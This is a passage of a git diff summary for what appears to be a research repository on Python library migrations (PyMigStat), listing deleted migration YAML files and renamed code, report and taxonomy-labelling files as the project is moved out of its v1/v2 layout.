.../5924dc0_pycrypto,pycryptodome.yaml | 9 - .../598f275_flask-restplus,flask-restx.yaml | 33 - .../59d8319_flask-restplus,flask-restx.yaml | 22 - .../5a842ae_kafka-python,confluent-kafka.yaml | 45 - v1/data/migration/5c76c96_xlrd,openpyxl.yaml | 9 - v1/data/migration/5cb810e_pil,pillow.yaml | 16 - .../5ded32a_pycrypto,pycryptodome.yaml | 9 - .../migration/5eb6909_eventlet,gevent.yaml | 11 - .../migration/5f2c76c_py-bcrypt,bcrypt.yaml | 12 - .../5f4d92a_slackclient,slack-sdk.yaml | 20 - .../migration/633e7d1_gevent,eventlet.yaml | 9 - .../6b0f04a_pycrypto,pycryptodome.yaml | 9 - .../6b10345_kafka-python,confluent-kafka.yaml | 22 - .../6b629d0_flask-restplus,flask-restx.yaml | 50 - .../migration/6e7ee63_requests,aiohttp.yaml | 9 - .../70b3abc_mysql-python,pymysql.yaml | 12 - .../migration/71aff3a_retrying,tenacity.yaml | 28 - .../728f86e_django-rest-swagger,drf-yasg.yaml | 15 - .../migration/7811c8f_eventlet,gevent.yaml | 9 - v1/data/migration/7ba8676_logbook,loguru.yaml | 13 - v1/data/migration/7ea7ddb_flask,quart.yaml | 24 - .../813214e_slackclient,slack-sdk.yaml | 21 - v1/data/migration/85d50bb_pil,pillow.yaml | 61 - v1/data/migration/86244b6_pyqt5,pyside6.yaml | 97 - v1/data/migration/8778a80_pil,pillow.yaml | 12 - v1/data/migration/87a5671_xlrd,openpyxl.yaml | 9 - .../migration/89b64c6_raven,sentry-sdk.yaml | 13 - .../89c7afc_pymilvus-orm,pymilvus.yaml | 13 - .../migration/8d0ec68_retrying,tenacity.yaml | 13 - .../8ef3b62_flask-restful,flask-restplus.yaml | 30 - v1/data/migration/902b66d_pil,pillow.yaml | 9 - .../9291b54_pycryptodome,pycryptodomex.yaml | 35 - .../936761f_dataproperty,typepy.yaml | 14 - .../963f347_gcloud-aio-core,aiohttp.yaml | 13 - .../9abf7b1_slackclient,slack-sdk.yaml | 27 - v1/data/migration/9c85d66_pil,pillow.yaml | 9 - .../migration/a4c347a_eventlet,gevent.yaml | 12 - ...12d_flask-security,flask-security-too.yaml | 16 - .../migration/a5c04bb_requests,aiohttp.yaml | 24 - .../a688034_flask-restplus,flask-restx.yaml | 9 - v1/data/migration/a7375cc_celery,rq.yaml | 12 - .../a7f4c3f_pymilvus-orm,pymilvus.yaml | 12 - v1/data/migration/aa607bd_flask,quart.yaml | 25 - .../migration/ab4e5fd_requests,aiohttp.yaml | 14 - .../ae216dd_pycrypto,pycryptodome.yaml | 9 - .../b19aae1_pycrypto,pycryptodome.yaml | 12 - .../migration/b2c9313_requests,aiohttp.yaml | 9 - v1/data/migration/b687d20_huey,celery.yaml | 15 - .../migration/b86b375_raven,sentry-sdk.yaml | 22 - .../migration/b955ac9_ruamel.yaml,pyyaml.yaml | 34 - .../migration/b9b65c0_pyyaml,ruamel.yaml.yaml | 119 - v1/data/migration/baca6bb_urllib,urllib3.yaml | 9 - .../bbeb755_scapy-python3,scapy.yaml | 16 - v1/data/migration/bed73dc_urllib,urllib3.yaml | 9 - v1/data/migration/c08ec7a_huey,celery.yaml | 29 - .../migration/c77913a_eventlet,gevent.yaml | 9 - .../migration/c7c5a13_raven,sentry-sdk.yaml | 9 - .../migration/cbaf252_python-ldap,ldap3.yaml | 14 - .../migration/cc47b42_python-ldap,ldap3.yaml | 14 - .../cdaff15_pycrypto,cryptography.yaml | 12 - v1/data/migration/cdb6679_pil,pillow.yaml | 9 - v1/data/migration/cec78f4_pil,pillow.yaml | 12 - .../migration/cf856c0_gevent,eventlet.yaml | 27 - .../migration/d10cb16_raven,sentry-sdk.yaml | 18 - .../d15540f_gcloud-aio-core,aiohttp.yaml | 12 - .../migration/d3a9a16_requests,aiohttp.yaml | 33 - .../migration/d3bedb7_raven,sentry-sdk.yaml | 9 - .../d4119a0_flask-restful,flask-restplus.yaml | 16 - ...on-social-auth,social-auth-app-django.yaml | 9 - v1/data/migration/d6cd8df_pyqt5,pyside6.yaml | 9 - .../migration/d707ff6_gevent,eventlet.yaml | 13 - ...on-social-auth,social-auth-app-django.yaml | 9 - .../d8dedc7_pycrypto,pycryptodome.yaml | 18 - .../migration/dac43f8_gunicorn,waitress.yaml | 9 - v1/data/migration/db7f132_flask,quart.yaml | 13 - .../dcd48ef_fuzzywuzzy,rapidfuzz.yaml | 17 - v1/data/migration/dd3b266_urllib,urllib3.yaml | 10 - .../dec4ae0_scapy-python3,scapy.yaml | 9 - .../migration/df57533_raven,sentry-sdk.yaml | 9 - .../e192ca6_pycrypto,pycryptodome.yaml | 13 - .../migration/e38ec14_raven,sentry-sdk.yaml | 9 - v1/data/migration/e418cdc_pil,pillow.yaml | 9 - .../e5073e4_pymilvus-orm,pymilvus.yaml | 15 - .../e6b17da_pycrypto,pycryptodome.yaml | 10 - .../e706486_slackclient,slack-sdk.yaml | 24 - .../e7d4fd5_fuzzywuzzy,rapidfuzz.yaml | 13 - .../migration/ea23791_raven,sentry-sdk.yaml | 13 - .../migration/ee4d526_pyyaml,ruamel.yaml.yaml | 18 - .../f0761b8_scapy-python3,scapy.yaml | 16 - .../f08e9f1_mysql-python,pymysql.yaml | 22 - .../migration/f1120d3_raven,sentry-sdk.yaml | 37 - .../migration/f5ba90e_pyyaml,ruamel.yaml.yaml | 12 - .../migration/f6230c7_py-bcrypt,bcrypt.yaml | 13 - .../migration/f69877c_python-ldap,ldap3.yaml | 9 - .../migration/f7d2ea4_raven,sentry-sdk.yaml | 9 - v1/data/migration/f970b54_pil,pillow.yaml | 12 - v1/data/migration/fe6b437_pil,pillow.yaml | 9 - .../fe8e65d_dotenv,python-dotenv.yaml | 9 - v2/code/.idea/.gitignore | 8 - v2/code/.idea/PyMigStat.iml | 23 - .../inspectionProfiles/Project_Default.xml | 7 - .../inspectionProfiles/profiles_settings.xml | 7 - v2/code/.idea/misc.xml | 7 - v2/code/.idea/modules.xml | 8 - v2/code/.idea/other.xml | 7 - v2/code/.idea/vcs.xml | 6 - v2/code/README.md | 20 - v2/code/pymigstat/runnables/__init__.py | 0 v2/code/pymigstat/taxonomy/__init__.py | 0 1170 files changed, 12 insertions(+), 81529 deletions(-) rename {v2/code => code}/.gitignore (100%) rename {v2/code => code}/LICENSE (100%) rename {v2/code => code}/configs/config.yaml (100%) rename {v1/code/core => code/pymigstat}/__init__.py (100%) rename {v1/code/query => code/pymigstat/code_change_search}/__init__.py (100%) rename {v2/code => code}/pymigstat/code_change_search/diff_meta_parser.py (100%) rename {v2/code => code}/pymigstat/code_change_search/find_code_changes.py (100%) rename {v2/code => code}/pymigstat/code_change_search/usage_resolver.py (100%) rename {v2/code => code}/pymigstat/complexity/__init__.py (100%) rename {v2/code => code}/pymigstat/complexity/max_cardinality.py (100%) rename {v2/code => code}/pymigstat/complexity/mfiles_migration_complexity.py (100%) rename {v2/code => code}/pymigstat/complexity/mig_loc.py (100%) rename {v2/code => code}/pymigstat/complexity/migration_metric.py (100%) rename {v2/code => code}/pymigstat/complexity/num_apis.py (100%) rename {v2/code => code}/pymigstat/complexity/num_changes.py (100%) rename {v2/code => code}/pymigstat/complexity/pe_set.py (100%) rename {v2/code => code}/pymigstat/complexity/prop_set.py (100%) rename {v2/code => code}/pymigstat/complexity/unique_apis.py (100%) rename {v2/code => code}/pymigstat/complexity/unique_mappings.py (100%) rename {v2/code => code}/pymigstat/config.py (100%) rename {v2/code/pymigstat => code/pymigstat/core}/__init__.py (100%) rename {v2/code => code}/pymigstat/core/import_statement_finder.py (100%) rename {v2/code => code}/pymigstat/core/pypi_cache.py (100%) rename {v2/code => code}/pymigstat/csv_helper.py (100%) rename {v2/code/pymigstat/code_change_search => code/pymigstat/datamodels}/__init__.py (100%) rename {v2/code => code}/pymigstat/datamodels/api_mapping.py (100%) rename {v2/code => code}/pymigstat/datamodels/data_reader.py (100%) rename {v2/code => code}/pymigstat/datamodels/datamodel.py (100%) rename {v2/code => code}/pymigstat/datamodels/loaders.py (100%) rename {v2/code => code}/pymigstat/datamodels/migration.py (100%) rename {v2/code => code}/pymigstat/datamodels/storage.py (100%) rename {v2/code/pymigstat/core => code/pymigstat/latex}/__init__.py (100%) rename {v2/code => code}/pymigstat/latex/core.py (100%) rename {v2/code => code}/pymigstat/latex/graphics.py (100%) rename {v2/code => code}/pymigstat/latex/tables.py (100%) rename {v2/code => code}/pymigstat/latex/utils.py (100%) rename {v2/code => code}/pymigstat/pymigstat.py (100%) rename {v2/code => code}/pymigstat/reports/__init__.py (100%) rename {v2/code => code}/pymigstat/reports/api_mapping_data.py (100%) rename {v2/code => code}/pymigstat/reports/api_mapping_stats.py (100%) rename {v2/code => code}/pymigstat/reports/big_combination_stats.py (100%) rename {v2/code => code}/pymigstat/reports/cardinality_stat.py (100%) rename {v2/code => code}/pymigstat/reports/code_change_summary.py (100%) rename {v2/code => code}/pymigstat/reports/data_stats.py (100%) rename {v2/code => code}/pymigstat/reports/export_constant_data.py (100%) rename {v2/code => code}/pymigstat/reports/lib_pair_data.py (100%) rename {v2/code => code}/pymigstat/reports/lib_pair_stats.py (100%) rename {v2/code => code}/pymigstat/reports/mig_effort_stats.py (100%) rename {v2/code => code}/pymigstat/reports/migration_summary.py (100%) rename {v2/code => code}/pymigstat/reports/misc.py (100%) rename {v2/code => code}/pymigstat/reports/signature_change_stat.py (100%) rename {v2/code => code}/pymigstat/reports/update_report_data.py (100%) rename {v2/code/pymigstat/datamodels => code/pymigstat/runnables}/__init__.py (100%) rename {v2/code => code}/pymigstat/runnables/clean_up_data_files.py (100%) rename {v2/code => code}/pymigstat/runnables/convert_pymigbench_data.py (100%) rename {v2/code => code}/pymigstat/runnables/download_repos.py (100%) rename {v2/code => code}/pymigstat/runnables/filter_migration_data.py (100%) rename {v2/code => code}/pymigstat/runnables/find_all_code_changes.py (100%) rename {v2/code => code}/pymigstat/runnables/sample_migrations_for_code_change_labeling.py (100%) rename {v2/code/pymigstat/latex => code/pymigstat/taxonomy}/__init__.py (100%) rename {v2/code => code}/pymigstat/taxonomy/agreement_rate.py (100%) rename {v2/code => code}/pymigstat/taxonomy/agreement_rate_round_1.py (100%) rename {v2/code => code}/pymigstat/taxonomy/combine_rounds.py (100%) rename {v2/code => code}/pymigstat/taxonomy/constants.py (100%) rename {v2/code => code}/pymigstat/taxonomy/export_yaml.py (100%) rename {v2/code => code}/pymigstat/taxonomy/generate_taxonomy.py (100%) rename {v2/code => code}/pymigstat/taxonomy/merge_labellings.py (100%) rename {v2/code => code}/pymigstat/taxonomy/merge_labellings_round_1.py (100%) rename {v2/code => code}/pymigstat/tools/__init__.py (100%) rename {v2/code => code}/pymigstat/tools/external_tool.py (100%) rename {v2/code => code}/pymigstat/tools/git_repo_wrapper.py (100%) rename {v2/code => code}/pymigstat/utils/__init__.py (100%) rename {v2/code => code}/pymigstat/utils/gpt_client.py (100%) rename {v2/code => code}/pymigstat/utils/progress.py (100%) rename {v2/code => code}/pymigstat/utils/utils.py (100%) rename {v2/code => code}/report/code-changes.csv (100%) rename {v2/code => code}/report/combined-ccs-raw.csv (100%) rename {v2/code => code}/report/data-stats.csv (100%) rename {v2/code => code}/report/effort.csv (100%) rename {v2/code => code}/report/migration-combination--with-fc-groups.csv (100%) rename {v2/code => code}/report/migration-combination.csv (100%) rename {v2/code => code}/report/migrations.csv (100%) rename {v2/code => code}/report/taxonomy-stat-table.csv (100%) rename {v2/code => code}/requirements.txt (100%) rename {v2/code => code}/taxonomy-data/round1--merge.csv (100%) rename {v2/code => code}/taxonomy-data/round1-ajay.csv (100%) rename {v2/code => code}/taxonomy-data/round1-ildar.csv (100%) rename {v2/code => code}/taxonomy-data/round1-moha.csv (100%) rename {v2/code => code}/taxonomy-data/round1-sarah.csv (100%) rename {v2/code => code}/taxonomy-data/round2--merge.csv (100%) rename {v2/code => code}/taxonomy-data/round2-ajay.csv (100%) rename {v2/code => code}/taxonomy-data/round2-ildar.csv (100%) rename {v2/code => code}/taxonomy-data/round2-moha.csv (100%) rename {v2/code => code}/taxonomy-data/round2-sarah.csv (100%) rename {v2/code => code}/taxonomy-data/round3--merge.csv (100%) rename {v2/code => code}/taxonomy-data/round3-ajay.csv (100%) rename {v2/code => code}/taxonomy-data/round3-ildar.csv (100%) rename {v2/code => code}/taxonomy-data/round3-moha.csv (100%) rename {v2/code => code}/taxonomy-data/round3-sarah.csv (100%) rename {v2/data => data}/migration/aiohttp__httpx__itzkvn@python-http-monitoring__790a483.yaml (100%) rename {v2/data => data}/migration/aiohttp__httpx__sk-415@harukabot__0611d16.yaml (100%) rename {v2/data => data}/migration/aiohttp__httpx__snwmds@polemicbooksapi__69df530.yaml (100%) rename {v2/data => data}/migration/argparse__click__achalddave@segment-any-moving__87160d0.yaml (100%) rename {v2/data => data}/migration/argparse__click__adithyabsk@keep2roam__d340eea.yaml (100%) rename {v2/data => data}/migration/argparse__click__amesar@mlflow-tools__431737a.yaml (100%) rename {v2/data => data}/migration/argparse__click__ansible-community@molecule__b7d7740.yaml (100%) rename {v2/data => data}/migration/argparse__click__clearmatics@ion__03fb3a3.yaml (100%) rename {v2/data => data}/migration/argparse__click__godaddy@tartufo__553dc5f.yaml (100%) rename {v2/data => data}/migration/argparse__click__googlesamples@assistant-sdk-python__38e4e64.yaml (100%) rename {v2/data => data}/migration/argparse__click__grahame@sedge__3badf07.yaml (100%) rename {v2/data => data}/migration/argparse__click__himkt@pyner__76106a9.yaml (100%) rename {v2/data => data}/migration/argparse__click__klensy@wt-tools__760ff36.yaml (100%) rename {v2/data => data}/migration/argparse__click__kxr@o-must-gather__9da4722.yaml (100%) rename {v2/data => data}/migration/argparse__click__lqez@hog__d722ade.yaml (100%) rename {v2/data => data}/migration/argparse__click__magnetotesting@magneto__a5c82b8.yaml (100%) rename {v2/data => data}/migration/argparse__click__martinthoma@hwrt__86bc433.yaml (100%) rename {v2/data => data}/migration/argparse__click__oca@maintainer-tools__69593ae.yaml (100%) rename {v2/data => data}/migration/argparse__click__terryyin@google-translate-python__ac375b4.yaml (100%) rename {v2/data => data}/migration/argparse__click__yubico@yubioath-desktop__9d601b4.yaml (100%) rename {v2/data => data}/migration/argparse__configargparse__rocketmap@rocketmap__2960ec6.yaml (100%) rename {v2/data => data}/migration/argparse__docopt__ceph@teuthology__fb32105.yaml (100%) rename {v2/data => data}/migration/argparse__docopt__hootnot@oandapyv20-examples__e1df70e.yaml (100%) rename {v2/data => data}/migration/argparse__docopt__tankerhq@tbump__54b12e2.yaml (100%) rename {v2/data => data}/migration/asyncio-redis__aioredis__augerai@a2ml__13ea499.yaml (100%) rename {v2/data => data}/migration/asyncio-redis__aioredis__eyepea@api-hour__97286ef.yaml (100%) rename {v2/data => data}/migration/attrs__dataclasses__aiortc@aiortc__270edaf.yaml (100%) rename {v2/data => data}/migration/attrs__dataclasses__keepsafe@aiohttp__e51fb1f.yaml (100%) rename {v2/data => data}/migration/attrs__dataclasses__project-alice-assistant@projectalice__f1fe8cb.yaml (100%) rename {v2/data => data}/migration/attrs__dataclasses__simonlindholm@decomp-permuter__cfbb706.yaml (100%) rename {v2/data => data}/migration/bcrypt__passlib__twiliodeved@sms2fa-flask__22eedfc.yaml (100%) rename {v2/data => data}/migration/beautifulsoup__bs4__cfpb@cfgov-refresh__3262610.yaml (100%) rename {v2/data => data}/migration/botocore__boto__whoopinc@mkwheelhouse__54806ff.yaml (100%) rename {v2/data => data}/migration/botocore__boto__zalando@spilo__a83681c.yaml (100%) rename {v2/data => data}/migration/bottle__flask__cqmoe@python-cqhttp__f9f083e.yaml (100%) rename {v2/data => data}/migration/bottle__flask__heyman@locust__4067b92.yaml (100%) rename {v2/data => data}/migration/bottle__flask__nicolas-van@pygreen__843c8cf.yaml (100%) rename {v2/data => data}/migration/bunch__munch__1and1@confluencer__df895ac.yaml (100%) rename {v2/data => data}/migration/bunch__munch__fedora-infra@python-fedora__aca2a20.yaml (100%) rename {v2/data => data}/migration/celery__rq__sapfir0@premier-eye__a7375cc.yaml (100%) rename {v2/data => data}/migration/characteristic__attrs__rackerlabs@mimic__5bb4946.yaml (100%) rename {v2/data => data}/migration/chardet__cchardet__emlid@ntripbrowser__9161c19.yaml (100%) rename {v2/data => data}/migration/cheetah3__jinja2__openstack@ironic__cbf214b.yaml (100%) rename {v2/data => data}/migration/cheetah3__jinja2__shingetsu@saku__d1ad50a.yaml (100%) rename {v2/data => data}/migration/cheetah__jinja2__shingetsu@saku__d1ad50a.yaml (100%) rename {v2/data => data}/migration/click__argparse__kittenparry@meituri-downloader__422d73b.yaml (100%) rename {v2/data => data}/migration/click__argparse__neurostuff@nimare__2b80aa2.yaml (100%) rename {v2/data => data}/migration/click__argparse__nodepy@nodepy__715142c.yaml (100%) rename {v2/data => data}/migration/click__argparse__titusz@onixcheck__f17d186.yaml (100%) rename {v2/data => data}/migration/cloud-sptheme__sphinx-rtd-theme__danielyule@hearthbreaker__d018edf.yaml (100%) rename {v2/data => data}/migration/configparser__configobj__ctlearn-project@ctlearn__2375af8.yaml (100%) rename {v2/data => data}/migration/configparser__configobj__dbcli@mycli__b7a0b0f.yaml (100%) rename {v2/data => data}/migration/csv__unicodecsv__ckan@ckanext-datapackager__a6a3fb3.yaml (100%) rename {v2/data => data}/migration/csv__unicodecsv__codesy@codesy__b5824f4.yaml (100%) rename {v2/data => data}/migration/csv__unicodecsv__heroku@salesforce-bulk__2f787fa.yaml (100%) rename {v2/data => data}/migration/csv__unicodecsv__mlsecproject@combine__efe20ac.yaml (100%) rename {v2/data => data}/migration/csv__unicodecsv__praekelt@molo__567b66f.yaml (100%) rename {v2/data => data}/migration/csv__unicodecsv__radremedy@radremedy__8fa9b7f.yaml (100%) rename {v2/data => data}/migration/csv__unicodecsv__shoopio@shoop__639e3b5.yaml (100%) rename {v2/data => data}/migration/dataproperty__typepy__thombashi@datetimerange__936761f.yaml (100%) rename {v2/data => data}/migration/dataproperty__typepy__thombashi@pingparsing__45fac3c.yaml (100%) rename {v2/data => data}/migration/dataproperty__typepy__thombashi@sqlitebiter__26c8e74.yaml (100%) rename {v2/data => data}/migration/dill__cloudpickle__blaze@distributed__6dc1f3f.yaml (100%) rename {v2/data => data}/migration/dill__cloudpickle__rapid-design-of-systems-laboratory@beluga__078e3e5.yaml (100%) rename {v2/data => data}/migration/django-rest-swagger__drf-yasg__bcgov@theorgbook__728f86e.yaml (100%) rename {v2/data => data}/migration/django-rest-swagger__drf-yasg__opengisch@qfieldcloud__4377d67.yaml (100%) rename {v2/data => data}/migration/django__utils__rq@django-rq__310ac1d.yaml (100%) rename {v2/data => data}/migration/docopt__argparse__aio-libs@aioftp__ba6ef08.yaml (100%) rename {v2/data => data}/migration/docopt__argparse__deepspace2@styleframe__ffc8d76.yaml (100%) rename {v2/data => data}/migration/docopt__argparse__mete0r@pyhwp__0c5c5e7.yaml (100%) rename {v2/data => data}/migration/docopt__click__michaeljoseph@changes__d9a8fae.yaml (100%) rename {v2/data => data}/migration/ed25519__pynacl__romanz@trezor-agent__e1bbdb4.yaml (100%) rename {v2/data => data}/migration/enum__aenum__princetonuniversity@psyneulink__5253a55.yaml (100%) rename {v2/data => data}/migration/ethereum__ethereum-utils__omisego@plasma-contracts__fc4ac19.yaml (100%) rename {v2/data => data}/migration/eventlet__gevent__c00w@bithopper__6612526.yaml (100%) rename {v2/data => data}/migration/eventlet__gevent__noisyboiler@wampy__f87f7be.yaml (100%) rename {v2/data => data}/migration/eventlet__gevent__phuks-co@throat__9a28960.yaml (100%) rename {v2/data => data}/migration/eventlet__gevent__stefal@rtkbase__a4c347a.yaml (100%) rename {v2/data => data}/migration/fabric3__invoke__skoczen@will__437f8be.yaml (100%) rename {v2/data => data}/migration/fabric3__paramiko__mirantis@openstack-lbaas__d7440d4.yaml (100%) rename {v2/data => data}/migration/flask-restful__flask-restplus__kizniche@mycodo__047263b.yaml (100%) rename {v2/data => data}/migration/flask-restful__flask-restplus__testdrivenio@flask-react-aws__d4119a0.yaml (100%) rename {v2/data => data}/migration/flask-restful__flask-restplus__ziirish@burp-ui__8ef3b62.yaml (100%) rename {v2/data => data}/migration/flask-restplus__flask-restx__apryor6@flaskerize__59d8319.yaml (100%) rename {v2/data => data}/migration/flask-restplus__flask-restx__kizniche@mycodo__5169173.yaml (100%) rename {v2/data => data}/migration/flask-restplus__flask-restx__orchest@orchest__6b629d0.yaml (100%) rename {v2/data => data}/migration/flask-restplus__flask-restx__pythondataintegrator@pythondataintegrator__598f275.yaml (100%) rename {v2/data => data}/migration/flask__bottle__arosenfeld@immunedb__6141b13.yaml (100%) rename {v2/data => data}/migration/flask__fastapi__bretttolbert@verbecc-svc__24a848d.yaml (100%) rename {v2/data => data}/migration/flask__fastapi__virtuber@openvtuber__3abbc43.yaml (100%) rename {v2/data => data}/migration/flask__quart__elblogbruno@notionai-mymind__002f5bd.yaml (100%) rename {v2/data => data}/migration/flask__quart__intel@stacks-usecase__22cc3f0.yaml (100%) rename {v2/data => data}/migration/flask__quart__learningorchestra@learningorchestra__db7f132.yaml (100%) rename {v2/data => data}/migration/flask__quart__pgjones@faster_than_flask_article__0a70f2b.yaml (100%) rename {v2/data => data}/migration/flask__quart__synesthesiam@voice2json__7ea7ddb.yaml (100%) rename {v2/data => data}/migration/flask__quart__talkpython@async-techniques-python-course__aa607bd.yaml (100%) rename {v2/data => data}/migration/flask__tornado__krischer@instaseis__13c26a6.yaml (100%) rename {v2/data => data}/migration/flask__uvicorn__virtuber@openvtuber__3abbc43.yaml (100%) rename {v2/data => data}/migration/fuzzywuzzy__rapidfuzz__nlpia@nlpia-bot__054d5d2.yaml (100%) rename {v2/data => data}/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__45d94dd.yaml (100%) rename {v2/data => data}/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__963f347.yaml (100%) rename {v2/data => data}/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__d15540f.yaml (100%) rename {v2/data => data}/migration/gcloud__google__googlecloudplatform@gcloud-python__e55a1d8.yaml (100%) rename {v2/data => data}/migration/gcloud__google__wal-e@wal-e__be9820b.yaml (100%) rename {v2/data => data}/migration/gevent__eventlet__duanhongyi@dwebsocket__d707ff6.yaml (100%) rename {v2/data => data}/migration/gevent__eventlet__miguelgrinberg@flask-socketio__883e73e.yaml (100%) rename {v2/data => data}/migration/gevent__eventlet__projectcalico@felix__657e727.yaml (100%) rename {v2/data => data}/migration/gevent__eventlet__stefal@rtkbase__cf856c0.yaml (100%) rename {v2/data => data}/migration/gevent__eventlet__thenetcircle@dino__119d922.yaml (100%) rename {v2/data => data}/migration/gunicorn__waitress__openphilology@nidaba__4bab2ee.yaml (100%) rename {v2/data => data}/migration/guzzle-sphinx-theme__sphinx-rtd-theme__jamesls@semidbm__aa0baba.yaml (100%) rename {v2/data => data}/migration/html5lib__bleach__posativ@isso__f1a4478.yaml (100%) rename {v2/data => data}/migration/html5lib__bleach__pycon@pycon__3dba963.yaml (100%) rename {v2/data => data}/migration/httplib2__requests__ankitects@anki__f6245cd.yaml (100%) rename {v2/data => data}/migration/httplib2__requests__cpfair@tapiriik__495db93.yaml (100%) rename {v2/data => data}/migration/httplib2__requests__hasgeek@flask-lastuser__6114ad5.yaml (100%) rename {v2/data => data}/migration/httplib2__requests__hpe-storage@python-3parclient__75b94d3.yaml (100%) rename {v2/data => data}/migration/httplib2__requests__jarodl@flask-github__341c769.yaml (100%) rename {v2/data => data}/migration/httplib2__requests__jgorset@facepy__89ba1d4.yaml (100%) rename {v2/data => data}/migration/httplib2__requests__openshot@openshot-qt__4349753.yaml (100%) rename {v2/data => data}/migration/httplib2__requests__openstack@deb-nova__346d941.yaml (100%) rename {v2/data => data}/migration/httplib2__requests__openstack@networking-cisco__075010a.yaml (100%) rename {v2/data => data}/migration/httplib2__requests__wikimedia@pywikibot__952665a.yaml (100%) rename {v2/data => data}/migration/hubstorage__scrapinghub__scrapinghub@scrapinghub-entrypoint-scrapy__80b2262.yaml (100%) rename {v2/data => data}/migration/hubstorage__scrapinghub__scrapy-plugins@scrapy-pagestorage__ce31d53.yaml (100%) rename {v2/data => data}/migration/huey__celery__lonelam@onlinejudgeshu__b687d20.yaml (100%) rename {v2/data => data}/migration/ipaddr__ipaddress__google@capirca__eb768ea.yaml (100%) rename {v2/data => data}/migration/ipaddr__ipaddress__reannz@faucet__4a23ef8.yaml (100%) rename {v2/data => data}/migration/ipaddr__ipaddress__rvojcik@rtapi__2c25c05.yaml (100%) rename {v2/data => data}/migration/ipaddr__netaddr__openstack@deb-designate__eb16b1e.yaml (100%) rename {v2/data => data}/migration/ipaddr__netaddr__openstack@fuel-devops__5d0df07.yaml (100%) rename {v2/data => data}/migration/ipaddr__netaddr__openstack@wsme__002473c.yaml (100%) rename {v2/data => data}/migration/ipaddr__py2-ipaddress__evgeni@bley__dcc4285.yaml (100%) rename {v2/data => data}/migration/ipaddr__py2-ipaddress__jdswinbank@comet__1549e86.yaml (100%) rename {v2/data => data}/migration/ipaddr__py2-ipaddress__magic-wormhole@magic-wormhole__5b23669.yaml (100%) rename {v2/data => data}/migration/ipaddr__py2-ipaddress__meejah@txtorcon__c8fdba0.yaml (100%) rename {v2/data => data}/migration/ipaddr__py2-ipaddress__redhat-cip@hardware__a429c38.yaml (100%) rename {v2/data => data}/migration/ipaddr__py2-ipaddress__rvojcik@rtapi__2c25c05.yaml (100%) rename {v2/data => data}/migration/ipaddr__py2-ipaddress__stackstorm@st2__4022aea.yaml (100%) rename {v2/data => data}/migration/ipaddress__netaddr__napalm-automation@napalm__085994a.yaml (100%) rename {v2/data => data}/migration/jsonpath-rw__jsonpath-rw-ext__hxlstandard@libhxl-python__0babff2.yaml (100%) rename {v2/data => data}/migration/jsontableschema__tableschema__frictionlessdata@tableschema-sql-py__a1385f7.yaml (100%) rename {v2/data => data}/migration/kafka-python__confluent-kafka__biznetgio@restknot__6b10345.yaml (100%) rename {v2/data => data}/migration/kafka-python__confluent-kafka__openstack@oslo.messaging__5a842ae.yaml (100%) rename {v2/data => data}/migration/kafka__confluent-kafka__svenskaspel@locust-plugins__fad53da.yaml (100%) rename {v2/data => data}/migration/leveldb__plyvel__ethereum@py-evm__5c273ff.yaml (100%) rename {v2/data => data}/migration/leveldb__plyvel__gdassori@spruned__4326c64.yaml (100%) rename {v2/data => data}/migration/leveldb__plyvel__obsidianforensics@hindsight__973b3d3.yaml (100%) rename {v2/data => data}/migration/lockfile__fasteners__kizniche@mycodo__547f6d9.yaml (100%) rename {v2/data => data}/migration/lockfile__fasteners__paratoolsinc@taucmdr__2a2c28a.yaml (100%) rename {v2/data => data}/migration/lockfile__fasteners__samschott@maestral__e4388ee.yaml (100%) rename {v2/data => data}/migration/logbook__loguru__thombashi@sqlitebiter__311c7ce.yaml (100%) rename {v2/data => data}/migration/logbook__loguru__thombashi@tcconfig__7ba8676.yaml (100%) rename {v2/data => data}/migration/logger__logging__prtg@pythonminiprobe__2b6a1ae.yaml (100%) rename {v2/data => data}/migration/lxml__defusedxml__haiwen@seafdav__5e1291f.yaml (100%) rename {v2/data => data}/migration/lxml__defusedxml__openvinotoolkit@open_model_zoo__7c2529f.yaml (100%) rename {v2/data => data}/migration/lxml__defusedxml__synacktiv@eos__ac9596f.yaml (100%) rename {v2/data => data}/migration/m2crypto__cryptography__kevoreilly@capev2__abf58a7.yaml (100%) rename {v2/data => data}/migration/m2crypto__cryptography__yubico@python-u2flib-server__65c4665.yaml (100%) rename {v2/data => data}/migration/mechanize__requests__jorgecarleitao@public-contracts__70a229c.yaml (100%) rename {v2/data => data}/migration/migrate__alembic__kickstandproject@payload__ffeff6a.yaml (100%) rename {v2/data => data}/migration/models__model__hwwang55@gcn-lpa__7a97486.yaml (100%) rename {v2/data => data}/migration/msgpack__u-msgpack-python__crossbario@autobahn-python__9e00896.yaml (100%) rename {v2/data => data}/migration/msgpack__u-msgpack-python__kushalp@serfclient-py__3adbf0f.yaml (100%) rename {v2/data => data}/migration/multiprocess__multiprocessing__axelrod-python@axelrod__70f3a35.yaml (100%) rename {v2/data => data}/migration/multiprocess__multiprocessing__intelpni@brainiak__e62dc1d.yaml (100%) rename {v2/data => data}/migration/multiprocess__multiprocessing__markovmodel@msmtools__a3a152e.yaml (100%) rename {v2/data => data}/migration/multiprocessing__multiprocess__czheo@syntax_sugar_python__1dbc1d4.yaml (100%) rename {v2/data => data}/migration/multiprocessing__multiprocess__jhsmit@colicoords__a082ad5.yaml (100%) rename {v2/data => data}/migration/napalm-base__napalm__afourmy@e-napalm__1033665.yaml (100%) rename {v2/data => data}/migration/netaddr__ipaddress__ovirt@vdsm__6eef802.yaml (100%) rename {v2/data => data}/migration/netaddr__py2-ipaddress__jimfunk@django-postgresql-netfields__a5a1118.yaml (100%) rename {v2/data => data}/migration/netaddr__py2-ipaddress__nitmir@policyd-rate-limit__c024e06.yaml (100%) rename {v2/data => data}/migration/neutron__neutron-lib__openstack@networking-bagpipe__4bb14fa.yaml (100%) rename {v2/data => data}/migration/neutron__neutron-lib__openstack@networking-fortinet__2365dcb.yaml (100%) rename {v2/data => data}/migration/neutron__neutron-lib__openstack@networking-generic-switch__c6f4b71.yaml (100%) rename {v2/data => data}/migration/neutron__neutron-lib__openstack@networking-nec__ff1695d.yaml (100%) rename {v2/data => data}/migration/neutron__neutron-lib__openstack@networking-odl__a40b9d9.yaml (100%) rename {v2/data => data}/migration/node-semver__semantic-version__openstack@solar__8766f11.yaml (100%) rename {v2/data => data}/migration/oauth2__oauthlib__discogs@discogs_client__c56f61a.yaml (100%) rename {v2/data => data}/migration/openpyxl__xlsxwriter__bcgov@gwells__57d12c4.yaml (100%) rename {v2/data => 